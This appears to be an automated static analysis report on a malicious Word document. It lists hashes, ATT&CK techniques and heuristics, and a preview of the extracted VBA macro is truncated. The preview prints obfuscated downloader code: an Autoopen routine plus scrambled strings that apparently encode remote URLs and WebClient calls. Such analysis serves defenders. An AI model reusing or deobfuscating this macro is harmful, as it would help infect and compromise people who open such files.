Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3c1c9825ec4d34c5…

MALICIOUS

Office (OLE)

Size: 159.5 KB
Created: 2018-05-16 07:31:00
Authoring application: Microsoft Office Word
First seen: 2018-06-30
MD5: cbf3f9cf470443f1f13151855369b42e
SHA-1: 4c2f1c989964ddfebfb9d2aeab906b8caf8b2436
SHA-256: 3c1c9825ec4d34c57e9495032fce447ff417c8c40ad95072713e96bfaaaf19b6
Risk score: 142

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing a VBA macro. An Autoopen macro is present, so the code runs as soon as the document is opened with macros enabled, and a critical heuristic flags a call to the Shell() function, which indicates an attempt to execute arbitrary commands. The macro code is heavily obfuscated (string-assembly helpers and arithmetic filler), so the exact payload and its destination could not be determined statically, but the combination of automatic execution and a Shell() call is a strong indicator of malicious intent.

Heuristics (5)

  • VBA macros detected (medium; 2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   137834 bytes
SHA-256: c016ed25bc3ec4bbfa5d5ccf22bcc32e53de80b1835559d8e493084cc78f5727
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "rdDSmpfqaDQY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ZpLErQ(JsQGF)
SzNSA = jdWCc
wZlDAw = mjjXMU + CDbl(73044 - PwbMH - zYnBv + CDbl(1868)) - 25848 - CDbl(20421)
DnjIu = lGrRXS
lbBwO = 6488
End Sub
Sub ivpVW(BwBFzV)
QdkdLr = isjvjG
nLzzmK = oIzNlz + CDbl(79699 - FlUBqF - rYmWb + CDbl(75105)) - 74308 - CDbl(21345)
lQUNnB = LLicU
PZumrm = 96320
hPXfTb = PiGBz
bVcbw = dIqId + CDbl(75661 - IMcpv - NTDAwi + CDbl(37584)) - 50079 - CDbl(94071)
dcaXln = RKsjU
rHtrQ = 35821
nsLBki = Ujtfd
NNjCPS = IKfCQ + CDbl(86381 - MtCqD - wIkRZ + CDbl(75057)) - 4076 - CDbl(30479)
lRNFnF = brbzzq
NIlrhL = 51984
End Sub
Sub CcWiEc(dcQFY)
NoKFv = SLOFJI
XInvUE = IPljE + CDbl(632 - MOwhs - EzTal + CDbl(73116)) - 57182 - CDbl(16623)
nWMaa = GphwB
QwDbB = 91373
GwQXRq = XoMKia
pcOXi = wFZRlr + CDbl(4203 - AQzkqz - VXzuj + CDbl(99967)) - 64217 - CDbl(33641)
XNaPaW = DWVjAX
maolWY = 25398
End Sub
Sub Autoopen()
On Error Resume Next
rczUE = dvaPo
uXQmOi = wNVNCw + CDbl(47443 - TuOKs - zWzRG + CDbl(33669)) - 49645 - CDbl(51097)
vULaEP = BXszR
WPvVj = 5300
ZAKOqSA (ALEvh + BoXpINiVkY + BSVIMB)
lasqY = zJtrR
wkziWk = XRbjQQ + CDbl(86230 - NrjPf - vbwWFw + CDbl(22655)) - 10196 - CDbl(675)
UmAjM = kwXbi
JrcZf = 25472
End Sub
Sub RMbmwC(DMRnZ)
QUOdP = vMHhs
SrRFt = RwVjut + CDbl(397 - jCwXh - CMnocz + CDbl(19414)) - 42467 - CDbl(35039)
Jijij = rwSlW
whaVdO = 55277
OjzIBF = dcuVv
wZPJRV = LzFwM + CDbl(52661 - GOHVv - aIZiah + CDbl(51109)) - 15394 - CDbl(27606)
YQbuz = KLLsH
OiDwap = 95097
UYZBG = zlikuN
ihfljS = EvKClt + CDbl(89638 - aiHlKA - zrZoH + CDbl(16319)) - 48811 - CDbl(55745)
wujkzY = tWzKY
WQMvE = 19418
End Sub
Sub dJCzd(nLsLpi)
iErKK = CTNOKp
lVJcME = Yworl + CDbl(13847 - kzALK - FfRYBk + CDbl(10845)) - 14854 - CDbl(69896)
vrHAw = CQwlP
kPAYDj = 34098
End Sub

Attribute VB_Name = "MDAKWFDlac"
Sub Hoitzi(SRwkN)
PLvBX = hWpPCs
wirPRp = mIFBW + CDbl(1336 - wQzYcp - vKJBNz + CDbl(89838)) - 54223 - CDbl(33796)
jBIib = CfurmH
tfXik = 12043
End Sub
Function BoXpINiVkY()
On Error Resume Next
raCPAU = NEsbKq
VUsLVo = shwooE + CDbl(30775 - pOKVb - FzshHu + CDbl(79913)) - 51897 - CDbl(5065)
cQZYK = WPRtwt
bMQRq = 27674
vqdSi = AAItW
Xcdqa = uKOion + CDbl(34171 - ThIai - qYXDU + CDbl(18206)) - 35114 - CDbl(47558)
crBZvI = QqsTYJ
QBqBi = 87545
btWzfMZ = ombRc("Kke//:0BO+0BOp0BO'+'+0BOtth 0BO+0BO VB00BO+0BO 0BO+0BO= XCDAW8C0BO+'+'0BO;)33120BO+0BO82zLa%", 37547 + 5 - 37547, 37547 + 86 - 37547)
riPNf = FZVRPW
lnnNW = fQShKl + CDbl(63567 - GBiIn - ilImMQ + CDbl(18208)) - 66655 - CDbl(82836)
bECwW = OdijOC
BEbwi = 97203
YEFwzk = jtEmP
nnElJj = sNlnFW + CDbl(14821 - UTsRp - RaSbG + CDbl(4777)) - 20259 - CDbl(69758)
jYzWj = ZnLoEi
TRtcd = 8923
vUmpviOb = ombRc("IIlxUK/ku.oc.0BO+0BOt0BO+0BOfos0BO+0BOegami/0BO+0BO/:0BO+0BOptth@/'+'0BO+0BOd4ojLj/0BO'+'+0BOed0BO+0BO.0BO+0BOepp0BO+0BOurg0BO+0BO-y0BO+0BOs0BO+0BOaOYLP1", 45162 + 6 - 45162, 45162 + 146 - 45162)
aLUab = NlKDj
IrBOI = bIujh + CDbl(55513 - ZGGAhd - FUuYD + CDbl(43731)) - 88924 - CDbl(19821)
ncIHoa = SCkcB
UudrqC = 30468
wGzim = mJpomo
NPUJQ = zZHstI + CDbl(27046 - JoOCcq - Tjiuz + CDbl(34047)) - 795 - CDbl(76591)
KSZFco = jEoNrr
DWYwd = 39464
zGnPfmZS = ombRc("CaO0+VB0xe.VB00BO+0BO( + 0BO+0BOBSN0BO+0BOW0BO+0BO8C0BO+0BO 0BO+0BO+0BO+0NW9c%", 12796 + 6 - 12796, 12796 + 71 - 12796)
mJwEtj = PTLwlO
biIHVG = wocVcS + CDbl(58331 - YSWTR - JaAjE + CDbl(90685)) - 31970 - CDbl(70656)
OFcjcn = rINso
VjQQI = 83864
AIVCz = dzzCJ
RETYaH = jbROQd + CDbl(63668 - jfruO - ClIrJ + CDbl(47566)) - 33635 - CDbl(239)
sCTsb = HDBOU
djuFZ = 34845
LfkcQRBfwv = ombRc("afhe0B'+'O+0BOi0BO+0BOlCbeW.teN.0BO+0BOm'+'0BO+0BOetsy0BO+0BOS )VB0tcejb0BO'+'+0BOo-VB0BLljIN3", 89786 + 7 - 89786, 89786 + 85 - 89786)
uRGHu = PTLjQ
ijUYLw = Fjcbpj + CDbl(88600 - YBOlk - LGpmu + CDbl(46690)) - 54315 - CDbl(22099)
wWk
... (truncated)